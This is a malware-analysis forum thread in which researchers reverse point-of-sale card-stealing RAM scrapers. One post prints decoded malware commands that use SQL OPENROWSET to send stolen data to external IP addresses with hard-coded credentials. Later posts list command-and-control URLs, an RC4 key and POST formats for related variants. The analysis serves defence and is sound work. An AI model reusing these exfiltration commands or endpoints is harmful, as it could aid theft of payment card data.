Point-of-Sale malwares / RAM scrapers

Forum for analysis and discussion about malware.
Post Reply
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Fri Feb 01, 2013 12:44 pm

It was written in January 27th.. Why no one told me this?
I feel so darn stupid to realize that only ME doesn't know anything about the previous details..
I spent a lot of my time researching for nothing..
bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Fri Feb 01, 2013 12:55 pm

You're funny :)

Any idea about encryption after reading that post?
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Fri Feb 01, 2013 8:01 pm

exitthematrix wrote:Any idea about encryption after reading that post?
This key in below registry may help:
  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Retalix\Security, or
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Retalix\Security

Code: Select all

Security = 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 0
But I need "data" or "traffic" to test decoding of this key.

Sice we cannot get the traffic in all tries,
the only way left is to reverse this sample the way he did to get the what-so-called "weird strings".

See the below quoted from the post:
And the most epic stuff, I found a weird string used by another crappy function after nopping to see what happened if the malware found something in RAM:
Image
maybe it "sounds" like that.. I would be happy to see that "weird strings" values or just paste the Rx values,
(wasn't that difficult and not risky task to share anyway...and he didnt :-()
which decodes in:
Image
Oh, F(word) me! "What" to be decoded with "what" to burp these result??
If I may suggest please contact the writer and ask either the traffic data or memory register or that "weird strings" data from him,
because I won't spending more of my time on this with the so scattered details/info..
So many serious high risk infector out there which needed to be nailed too..than this empty cleaned up server..
User avatar
aaSSfxxx
Posts: 12
Joined: Tue Oct 23, 2012 8:28 pm

Fri Feb 01, 2013 9:42 pm

@unixfreakjp: first, I think the "Security" key you found won't help to decode data because it's just windows service manager crap (the malware creates its service of not installer, and then launches the service with the command round above.

Then, for the ugly string I found, it doesn't seem to be an encoded string, but just a list of characters which are taken to build the connection command (there sql server credentials were stored).

Btw if you don't want to load the malware with ollydbg, you can use IDA to have a global
view of the malware and locate interesting runPE (I'll send the ugly string tommorow, I'm on my smartphone here)
User avatar
aaSSfxxx
Posts: 12
Joined: Tue Oct 23, 2012 8:28 pm

Sat Feb 02, 2013 12:02 pm

Btw, I saw the comment of unixfreakjp on my blog, so I'll answer the two questions asked (I have to create another post since I can't edit my previous post) :

1. What was the "weird string" you talk about?

The string I found was

Code: Select all

BLC.bdR3S% 1!rA2l"h=EDWOwf6oU,s0Nec8muMk4Ttp-IiaQP',27h,';)v(xF
, used by the decrypt function at 004019F0 (in TcpAdaptorService1.exe)

2. With "what" you decoded that "weird string" to that sql inject command?

I decoded the function by stepping into the function I showed (at 004019F0), that's all. This function simply does bit permutation, it's not really a crypto function.
And sorry for the details, I was a bit lazy when I wrote the article :oops: (and there is nothing to explain, just follow the code with ollydbg).

Btw the sample "mmon.exe" helped me to understand what happened too (it's a debug version of the malware which doesn't include all service managing crap).
unixfreaxjp
Posts: 501
Joined: Thu Apr 12, 2012 4:53 pm

Sat Feb 02, 2013 5:04 pm

Hi. Thank's for the kindly explanation. I debugged and found same result
Image
Viewing the string, to find that you're right for the registry key wasn't for this. (tried to brute with the registry keys to many method encryption & doen't come with reasonable result either)
Permutation mentioned are bits operated which making me headache by following this my cui.I'll install IDA for following this more.

PS: I'm so sorry about you have to re-write the blog post. Not of my intention for that.
User avatar
EP_X0FF
Global Moderator
Posts: 4905
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Contact:

Sun Feb 03, 2013 3:40 am

unixfreaxjp wrote:Image
Viewing the string, to find that you're right for the registry key wasn't for this. (tried to brute with the registry keys to many method encryption & doen't come with reasonable result either)
Permutation mentioned are bits operated which making me headache by following this my cui.I'll install IDA for following this more.
Simple and primitive swapping. There few "encrypted" strings inside.

First

Code: Select all

"',27h,'4 d3rI-s8UTP9pecvaCwt,1;.BhfLSli2F(%)DQuNREO6MWmb0=k7oA!
decoded to

Code: Select all

svchosts -S  FS1 -U sa -P -Q "INSERT INTO OЃENэOWSET('SQLOLEDB','Network=DBMSSOCN;Address=46.166.178.209,443;uid=sa;pwd=sambo123!', 'SELECT tab from rec..tbl') SELECT '%s'"
How to? Load TcpAdaptorService (SHA-1 89089c3427ecfbdb4694ad07e821650ede514001) malware in olly, goto 004020A0 and start execution from it. Just F7 until 0040265E, where LEA take place. Here you have fully constructed string with probably a malware decoding BUG :D Notice
OЃENэOWSET
which should be
OPENROWSET
Also notice
FS1
which should be
MFS1
but first symbol for me is trashed (actual value 0x5).

Didn't dig too much, as it boring.

Second

Code: Select all

BLC.bdR3S% 1!rA2l"h=EDWOwf6oU,s0Nec8muMk4Ttp-IiaQP',27h,';)v(xF
decoded to

Code: Select all

svchosts.exe -S MFS1 -U sa -P -Q "INSERT INTO OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=46.108.132.18,443;uid=sa;pwd=sambo123!', 'SELECT tab from rec..tbl') SELECT '%s'
Decoder at 004019F0.
Ring0 - the source of inspiration
User avatar
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Sun Feb 03, 2013 11:01 am

Win32/Spy.POSCardStealer.B: https://www.virustotal.com/file/b3e15a2 ... 359887855/ > 31/45
a variant of Win32/Spy.POSCardStealer.D: https://www.virustotal.com/file/bc7dd5d ... 359888491/ > 29/46

btw the unknown scraper (http://www.kernelmode.info/forum/viewto ... 756#p17063) is now know as Win32/Spy.POSCardStealer.B
and found a POS malware named 'Alina' i will post more samples later.
You do not have the required permissions to view the files attached to this post.
bsteo
Posts: 84
Joined: Fri Nov 16, 2012 5:50 pm

Sun Feb 03, 2013 11:31 am

Xylitol wrote:Win32/Spy.POSCardStealer.B: https://www.virustotal.com/file/b3e15a2 ... 359887855/ > 31/45
a variant of Win32/Spy.POSCardStealer.D: https://www.virustotal.com/file/bc7dd5d ... 359888491/ > 29/46

btw the unknown scrapper (http://www.kernelmode.info/forum/viewto ... 756#p17063) is now know as Win32/Spy.POSCardStealer.B
b3e15a281bb3e1f5ef63841c1801118f6262ac8fb1c8daa45fd99c051011de4b

Sends encrypted with RC4 base64 data to: http://192.168.1.9/FUCKERS/post.php
Is this a work in progress? Test/beta? (192.168.1.9)
Data is RC4 encrypted with "B0tswanaRul3z" key.
Seems to be a variant of that mm_bot.exe previously posted by you but more advanced, more options (or just DEBUG?).

bc7dd5d2fcb072941a2aa9752d0ec8e0933d0ee5406b0d117d9c455083e835d6

Sends POST data to: http://84.22.106.94/panel2asdasd/up.php (data as: act=%s&b=%s&c=%s&v=%s&%s=) every 20 seconds!

The guy seems Romanian, his girlfriend is "Alina" :) ("Alina v2.1", "alina=", "X:\code\grab\src\Release\Alina.pdb")

Is not the same malware.
User avatar
Xylitol
Global Moderator
Posts: 1684
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Sun Feb 03, 2013 11:59 am

You do not have the required permissions to view the files attached to this post.
Post Reply